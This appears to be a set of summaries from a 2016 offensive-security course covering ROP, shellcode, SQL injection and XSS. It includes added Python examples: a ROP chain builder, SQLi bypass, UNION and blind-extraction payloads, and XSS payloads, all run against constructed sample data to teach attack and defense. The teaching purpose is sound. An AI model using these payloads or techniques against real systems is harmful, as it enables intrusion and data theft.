September 30, 2016

In this lecture our guest, Dr. Devin Cook, offers a brief overview of the history of modern binary exploitation. He covers everything from early buffer overflows and the first stack overflow mitigations to modern mitigations, modern bypass techniques, and Return Oriented Programming (ROP).

September 26, 2016

The first half of this lecture covers new material: professional tips for Return Oriented Programming (ROP) gadget hunting, the analysis and design of advanced shellcode, and a walkthrough of a dynamic shellcode linker engine. The second half is given by guest lecturer Dr. Devin Cook, who demonstrates the ROP gadget finder, compiler, and chaining tool he uses as part of Samuri's Capture The Flag (CTF) team.

Return Oriented Programming (ROP) is introduced and the modern history of exploit mitigations is revisited. Other *-oriented programming exploitation techniques, such as Jump Oriented Programming (JOP) and Call Oriented Programming (COP), are discussed at a high level. We walk through how to chain functions together on the stack under various function calling conventions (cdecl, fastcall, stdcall), and introduce the concept of gadgets. ROP gadget compilers are introduced briefly. Finally, the second half of the lecture presents a review of topics for MIDTERM 2.
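As an added illustration of the two ideas above (gadget hunting from the September 26 lecture, and chaining functions on the stack under cdecl, stdcall and fastcall), here is a small Python example. It is not the lecture's tool or Dr. Cook's code: the x86 byte patterns are real one-byte encodings, but the code segment, its load address (0x08048000) and the function addresses used in the chains are constructed for the example.

```python
import struct

# Constructed 32-bit x86 code bytes standing in for a mapped executable
# segment; the load address 0x08048000 is an assumption. The encodings are
# real: 0x58-0x5f are the one-byte pops (eax,ecx,edx,ebx,esp,ebp,esi,edi),
# 0xc3 is ret, and "pop ebp; ret" is the usual tail of a compiled function.
BASE = 0x08048000
SEGMENT = bytes([
    0x55, 0x89, 0xe5,      # push ebp; mov ebp, esp   (prologue, not a gadget)
    0x83, 0xec, 0x10,      # sub esp, 0x10
    0x5d, 0xc3,            # pop ebp; ret             -> gadget at BASE+6
    0x90, 0x90,            # nop; nop
    0x5b, 0x5e, 0xc3,      # pop ebx; pop esi; ret    -> gadgets at BASE+10, +11
    0x31, 0xc0,            # xor eax, eax
    0x5a, 0x59, 0xc3,      # pop edx; pop ecx; ret    -> gadgets at BASE+15, +16
    0xc3,                  # ret                      -> gadget at BASE+18
])
POPS = {0x58: "eax", 0x59: "ecx", 0x5a: "edx", 0x5b: "ebx",
        0x5c: "esp", 0x5d: "ebp", 0x5e: "esi", 0x5f: "edi"}


def find_gadgets(code, base, max_pops=4):
    """Walk backwards from every 0xc3 over single-byte pops.
    Returns {address: ["pop ebx", "pop esi", "ret"], ...}.  x86 has no
    instruction alignment, so every suffix is a gadget in its own right:
    "pop esi; ret" exists inside "pop ebx; pop esi; ret".  Only one-byte
    instructions are decoded here, so nothing is misclassified; real finders
    (ROPgadget, ropper) disassemble arbitrary instructions the same way."""
    found = {}
    for ret_off in (i for i, b in enumerate(code) if b == 0xc3):
        found[base + ret_off] = ["ret"]
        regs, off = [], ret_off
        while off > 0 and code[off - 1] in POPS and len(regs) < max_pops:
            off -= 1
            regs.insert(0, POPS[code[off]])
            found[base + off] = ["pop " + r for r in regs] + ["ret"]
    return found


def find_pops(gadgets, regs=None, n=0):
    """Lowest-addressed gadget of exactly n pops then ret.  regs=None accepts
    any registers except esp (stack cleanup: the popped values are discarded,
    and pop esp would pivot the stack); otherwise the pops must target
    exactly those registers, in order (argument setup for register calls)."""
    for addr in sorted(gadgets):
        popped = [ins.split()[1] for ins in gadgets[addr][:-1]]
        if regs is None and len(popped) == n and "esp" not in popped:
            return addr
        if regs is not None and popped == list(regs):
            return addr
    raise LookupError(f"no suitable gadget: {regs or n}")


def p32(x):
    return struct.pack("<I", x & 0xffffffff)


def build_chain(calls, convention, gadgets):
    """Bytes that replace a saved return address so that the functions in
    calls=[(addr, [int args]), ...] execute one after another.

    cdecl:    [f][pop*n; ret][args...][g]...   the caller must discard f's
              args, so a pop-n gadget sits in f's return slot and returns to g.
    stdcall:  [f][g][f args...][h][g args...]  the callee's `ret n` discards
              its own args, so f's return slot holds g directly.
    fastcall: [pop edx; pop ecx; ret][arg2][arg1][f]...  the first two args
              travel in ecx/edx (Microsoft fastcall; register args only here).
    The chain ends in a bare ret; a real chain ends in exit() or a call that
    never returns, otherwise the process crashes after the last call."""
    ret = find_pops(gadgets, n=0)
    chain = b""
    if convention == "cdecl":
        for func, args in calls:
            chain += p32(func)
            if args:
                chain += p32(find_pops(gadgets, n=len(args)))
                chain += b"".join(p32(a) for a in args)
        chain += p32(ret)
    elif convention == "stdcall":
        chain = p32(calls[0][0])
        for i, (func, args) in enumerate(calls):
            nxt = calls[i + 1][0] if i + 1 < len(calls) else ret
            chain += p32(nxt) + b"".join(p32(a) for a in args)
    elif convention == "fastcall":
        setup = find_pops(gadgets, regs=("edx", "ecx"))
        for func, args in calls:
            if len(args) > 2:
                raise ValueError("fastcall example handles register args only")
            a1, a2 = (list(args) + [0, 0])[:2]
            chain += p32(setup) + p32(a2) + p32(a1) + p32(func)
        chain += p32(ret)
    else:
        raise ValueError(convention)
    return chain


if __name__ == "__main__":
    g = find_gadgets(SEGMENT, BASE)
    for addr in sorted(g):
        print(hex(addr), "; ".join(g[addr]))
    calls = [(0x41414141, [1, 2]), (0x42424242, [3])]   # hypothetical targets
    for conv in ("cdecl", "stdcall", "fastcall"):
        print(conv, build_chain(calls, conv, g).hex())
```

The stdcall layout is the one that surprises people: because the callee pops its own arguments, each function's return slot must hold the next function directly, and that function's arguments appear after the slot, so consecutive calls interleave on the stack rather than simply following one another.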

September 19, 2016

The first half of the lecture covers Web Application Firewalls (WAFs) and how they are often trivially bypassed. The second half presents a walkthrough of alphanumeric, polymorphic, connect-back shellcode payload development techniques that are often used against WAFs, IDS, IPS, and other defenses. Connect-back shellcode development is discussed for Linux systems.

September 8, 2016

We cover the fragile public key infrastructure (PKI) ecosystem that supports Secure Sockets Layer (SSL) and Transport Layer Security (TLS): the internet's certificate authorities. We cover the disturbing history of modern Certificate Authority (CA) failures and frequent compromises, and how rarely any of them leads to consequences or improvement. Various attacks against SSL/TLS deployments and certificate authorities are covered.

This time server-side attacks are covered in depth, along with the OWASP Top 10. We cover broken authentication and/or session management, the category of security misconfiguration, insecure direct object references, targeting admin and user functions with cross-site request forgery (CSRF) and similar function-level access control vulnerabilities, directory traversal, and finally SQL injection (SQLi). Metacharacter injection is revisited again, as it encompasses almost all of these techniques in practice and gives a straightforward model for approaching the diverse attack surface of web applications. SQLi is covered in depth, with several walkthroughs and techniques (in-band error-based, in-band UNION-based, second-order in-band injection, partial blind, full blind, and more). We discuss SQLi discovery, fingerprinting, filter or restriction enumeration, table mapping, and finally data extraction. Defenses such as prepared statements and encoding are covered, along with several SQLi defense bypasses.
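An added Python example, not from the lecture itself, showing three of the SQLi techniques named above against one string-built login query, and the same inputs against a prepared statement. The schema, rows and the `flag{...}` value are constructed sample data in an in-memory SQLite database; the blind extractor uses SQLite's `length()`, `substr()` and `unicode()` functions, so the exact payloads would differ on another engine even though the method is the same.

```python
import sqlite3


def make_db():
    """In-memory database with constructed sample rows (no real data)."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE users(id INTEGER PRIMARY KEY, name TEXT, pw TEXT, role TEXT);
        INSERT INTO users(name, pw, role) VALUES ('alice', 'hunter2', 'admin');
        INSERT INTO users(name, pw, role) VALUES ('bob', 'letmein', 'user');
        CREATE TABLE secrets(id INTEGER PRIMARY KEY, owner TEXT, body TEXT);
        INSERT INTO secrets(owner, body) VALUES ('alice', 'flag{constructed-sample}');
    """)
    return db


def login_vulnerable(db, name, pw):
    """String-built query: the input is parsed as SQL grammar, so a quote in
    `name` ends the literal and whatever follows becomes part of the query."""
    sql = "SELECT name, role FROM users WHERE name = '%s' AND pw = '%s'" % (name, pw)
    return db.execute(sql).fetchall()


def login_prepared(db, name, pw):
    """Prepared statement: the SQL text is fixed before any input is seen and
    the values are bound as data, so metacharacters in them are inert."""
    sql = "SELECT name, role FROM users WHERE name = ? AND pw = ?"
    return db.execute(sql, (name, pw)).fetchall()


# --- in-band payloads: the injected query's result is echoed straight back ---
BYPASS_NAME = "alice' -- "                                   # comments out the pw check
UNION_NAME = "x' UNION SELECT owner, body FROM secrets -- "  # column count must match (2)


# --- full blind: nothing is echoed, only whether a row came back ---
def make_oracle(db):
    """Turn the vulnerable login into a true/false oracle for any SQL condition."""
    return lambda cond: bool(login_vulnerable(db, f"alice' AND ({cond}) -- ", "x"))


def blind_extract(oracle, expr, max_len=64):
    """Boolean-based blind extraction of the string returned by `expr` (a
    scalar subquery). Recovers the length, then each character's code point,
    by binary search: about 7 oracle queries per character instead of one
    per candidate character."""
    def lowest(prefix, lo, hi):
        # smallest v in [lo, hi] for which NOT (prefix > v), i.e. v == prefix
        while lo < hi:
            mid = (lo + hi) // 2
            if oracle(f"{prefix} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = lowest(f"length(({expr}))", 0, max_len)
    return "".join(chr(lowest(f"unicode(substr(({expr}), {i}, 1))", 32, 126))
                   for i in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    print("bypass   :", login_vulnerable(db, BYPASS_NAME, "wrong"))
    print("union    :", login_vulnerable(db, UNION_NAME, ""))
    print("blind    :", blind_extract(make_oracle(db),
                                      "SELECT body FROM secrets WHERE owner = 'alice'"))
    print("prepared :", login_prepared(db, BYPASS_NAME, "wrong"))
```

The blind extractor is the interesting part for defenders: it makes roughly 180 requests to pull a 24-character string, which is the traffic pattern (many near-identical requests differing in one number) that application logs and a WAF can key on even when the SQL itself is never visible.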

September 2, 2016

We cover the internals of most modern web browsers and web server architectures to present a deep overview of the massive attack surface associated with web applications and web browsing. The big picture is revisited and we discuss how modern binary exploitation techniques still apply heavily to each attack vector. Then we examine the growing security problem of indirect/background requests and the sharp rise of malicious third-party content and advertisements.

We introduce HTTP proxies and demonstrate the Burp Suite tool for intercepting web traffic. The second half of the lecture focuses on client-side web attack and defense. We examine the Document Object Model (DOM), JavaScript and how it can change the DOM, the Same-Origin Policy (SOP) and several SOP bypass techniques, and how all of this applies to the Cross-Site Scripting (XSS) family of techniques and related attacks such as Cross-Site Request Forgery (CSRF, also written XSRF). We discuss metacharacter injection and how it encompasses XSS and other techniques. Finally, defenses are demonstrated.
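An added Python example, not from the lecture, of the metacharacter-injection view of XSS and why the defense is context-dependent: the same encoding that neutralises a payload in element content does nothing in an unquoted attribute, and a correct JavaScript string literal still escapes a `<script>` block because the HTML parser runs before the JS engine. The three payloads are constructed sample inputs; the rendering functions are stand-ins for a template, not any real framework's API.

```python
import html
import json

# Constructed attacker inputs, one per output context (sample data, not
# taken from any real application).
BODY_PAYLOAD = "<script>alert(1)</script>"
ATTR_PAYLOAD = "x onmouseover=alert(1)"     # contains none of < > & " '
QUOTE_PAYLOAD = 'x" onmouseover="alert(1)'
JS_PAYLOAD = "</script><script>alert(1)</script>"


def body_unsafe(text):
    """Untrusted text placed straight into element content: < > & are markup."""
    return f"<p>{text}</p>"


def body_escaped(text):
    """HTML entity encoding neutralises the content-context metacharacters."""
    return f"<p>{html.escape(text)}</p>"


def attr_unquoted_escaped(value):
    """Escaping alone is not enough: an unquoted attribute value ends at the
    first space, so a payload with no metacharacter at all (nothing for
    html.escape to encode) still injects a new event-handler attribute."""
    return f"<input value={html.escape(value)}>"


def attr_quoted_escaped(value):
    """Quote the attribute and encode the quote characters (html.escape's
    default quote=True turns double quotes into &quot; and single quotes into
    &#x27;): the value can no longer end the attribute, whatever it holds."""
    return f'<input value="{html.escape(value, quote=True)}">'


def js_string_json_only(value):
    """json.dumps yields a valid JS string literal, but the HTML parser runs
    first and ends the <script> element at the first </script> it sees, long
    before the JS engine looks at the quotes."""
    return f"<script>var v = {json.dumps(value)};</script>"


def js_string_safe(value):
    """Encode < > & as \\uXXXX escapes inside the JSON literal: the JS engine
    decodes them, the HTML parser never sees a tag."""
    literal = (json.dumps(value).replace("<", "\\u003c")
                                .replace(">", "\\u003e")
                                .replace("&", "\\u0026"))
    return f"<script>var v = {literal};</script>"


def script_elements(doc):
    """Crude count of script start tags, enough to show whether an injection
    added one (a real check would use an HTML parser)."""
    return doc.lower().count("<script")


if __name__ == "__main__":
    for label, out in [("body unsafe", body_unsafe(BODY_PAYLOAD)),
                       ("body escaped", body_escaped(BODY_PAYLOAD)),
                       ("attr unquoted", attr_unquoted_escaped(ATTR_PAYLOAD)),
                       ("attr quoted", attr_quoted_escaped(QUOTE_PAYLOAD)),
                       ("js json only", js_string_json_only(JS_PAYLOAD)),
                       ("js safe", js_string_safe(JS_PAYLOAD))]:
        print(f"{label:14} scripts={script_elements(out)}  {out}")
```

The practical rule this shows is the one the lecture's metacharacter model leads to: identify which parser consumes the output at each insertion point (HTML content, HTML attribute, JavaScript string, URL, CSS) and encode for that parser, rather than applying one "sanitize" function everywhere.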